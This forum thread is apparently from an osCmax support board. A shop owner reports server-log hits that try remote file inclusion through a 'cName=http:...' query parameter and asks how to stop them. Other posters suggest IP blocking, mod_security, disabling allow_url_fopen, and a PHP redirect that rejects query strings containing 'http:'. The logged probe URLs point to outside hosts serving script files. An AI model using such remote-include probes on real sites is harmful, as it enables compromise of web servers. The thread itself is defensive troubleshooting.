Full service web hosting, great prices and support. Starts at $1.99/month!
Results 1 to 10 of 10

Thread: Oscmax spam

  1. #1
    josemanuel
    Guest


    Default Oscmax spam

    I hope this is okay to post in this forum, I believe it may be.

    I have a functioning oscmax site, and recently started analyzing the server logs alot. I see an amount of visits that are to "http://mysite.com /index.php?cName=http:/spamsite.com/images?",

    Mysite.com is the pseudonym I will use for my site name, and the spamsite.com replaces their names. There are many names that are there.

    I wonder:

    1: is oscmax vulnerable to something here,

    2: is there something that I can add to my .htacess that denies these types of visits.

    I would appreciate if you can point me in the right direction,

    Jose Manuel

  2. #2
    neil
    Guest


    Default Re: Oscmax spam

    If you have cpanel there is a function in there that denys images to spamsite.
    You could also block IPs - also in cpanel.

  3. #3
    josemanuel
    Guest


    Default Re: Oscmax spam

    Thanks Neil. Unfortunately, I do not have cpanel. Is it possible to do this with htaccess?

  4. #4
    neil
    Guest


    Smile Re: Oscmax spam

    Google
    .htaccess block images
    Pages of results like:
    Preventing Image Bandwidth Theft With .htaccess (thesitewizard.com)
    Back up your .htaccess first before making any changes!

  5. #5
    josemanuel
    Guest


    Default Re: Oscmax spam

    That is useful, and I found some good information that I used to protect my images in the htaccess.

    I made the changes, and in a few hours will know if this is a solution, but I am not sure, as the activity in my traffic program is not watching the images, it is watching my urls for pages, and they are grabbing:
    http://mysite.com/index.php?cName=ht...u/rumusic.wav?

  6. #6
    josemanuel
    Guest


    Default Re: Oscmax spam

    Well, while I am glad to protect my images, this spam is still coming in. It is strange, the link does not seem to do anything. Any thoughts on what it does, what it is called (so I can search on it), and how to stop it?

  7. #7
    neil
    Guest


    Default Re: Oscmax spam

    You can block the ip address it is coming from, using .htaccess as well.
    Do a similar google search on
    block the ip address .htaccess
    Results like Clockwatchers - .htaccess Tutorial - Block An IP Address
    Spammers tend to change their IP addresses so it will be an ongoing process.

  8. #8
    josemanuel
    Guest


    Default Re: Oscmax spam

    Thanks Neil.

    Your comments are all good, but given that they keep coming from different IP addresses, I gave up on trying that.

    However, I did find a website earlier, called blockacountry.com, which creates a list of IP ranges structured for my htaccess, which will block all undesirable countries from my site. I hope I am not accidentally blocking any clients in my wanted country.

    This still does not fix the fear of this problem, and why they seem to be increasing this type of attack.

  9. #9
    BobH
    Guest


    Default Re: Oscmax spam

    I've been seeing the same sort of thing on my sites, and found this thread which addresses a possible solution: infobox passing unfriendly URL with SQL hack script - Help - osCommerce Community Support Forums
    I don't have cPanel, so am having to install mod_security the "old-fashioned" way. Googling "mod_security install" gives some decent installation instructions as well as recommended configurations.

    My hosting tech support folks suggested:
    "Where we don't provide Mod_security as one of our services, there is an alternative to help prevent these scripts from running. You will have to go into your php.ini file and turn allow_url_fopen off. This will make it so Apache does not treat url's like http://amymusicgirl.h17.ru/mysong.txt as a file. By not treating it as a file it won't execute any of the code located on the url."

    Unfortunately, turning "allow_url_fopen" to off blew up both my sites because of the rss news feeds on them plus didn't allow the SEO Assistant contrib to function, so I had to turn it back on. It may work for you, however.

    I hope this helps to give you some things to look at .

    Bob

  10. #10
    josemanuel
    Guest


    Default Re: Oscmax spam

    I know that this is not a vulnerability, but it was making it very hard for me to track my traffic. So, I kept working it, actually googled part of the source of this attempted old fashioned hack. I found this that helped alot After 3 great years, I'm being hacked! - osCommerce Community Support Forums. I posted the following into my application_top, and it seems to help:

    // redirect attempted remote file include exploits
    if (strpos(strtolower($_SERVER['QUERY_STRING']),'http:') !== false){
    header("Location: http://www.othersite.com");
    exit;
    }

Similar Threads

  1. PM Spam to some of our members - 10-17-07
    By michael_s in forum Announcements
    Replies: 0
    Last Post: 10-17-2007, 12:05 PM
  2. Spam being sent from my site mailbox
    By warrenthewindmill in forum osCmax v2 Installation issues
    Replies: 6
    Last Post: 01-17-2007, 10:25 AM
  3. empty mails after spam fix in general.php
    By Sander in forum osCmax v2 Customization/Mods
    Replies: 1
    Last Post: 09-26-2005, 04:37 AM
  4. Spam flaw in stock contact_us.php
    By neil in forum osCmax v2 Customization/Mods
    Replies: 0
    Last Post: 09-14-2005, 05:57 PM

Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •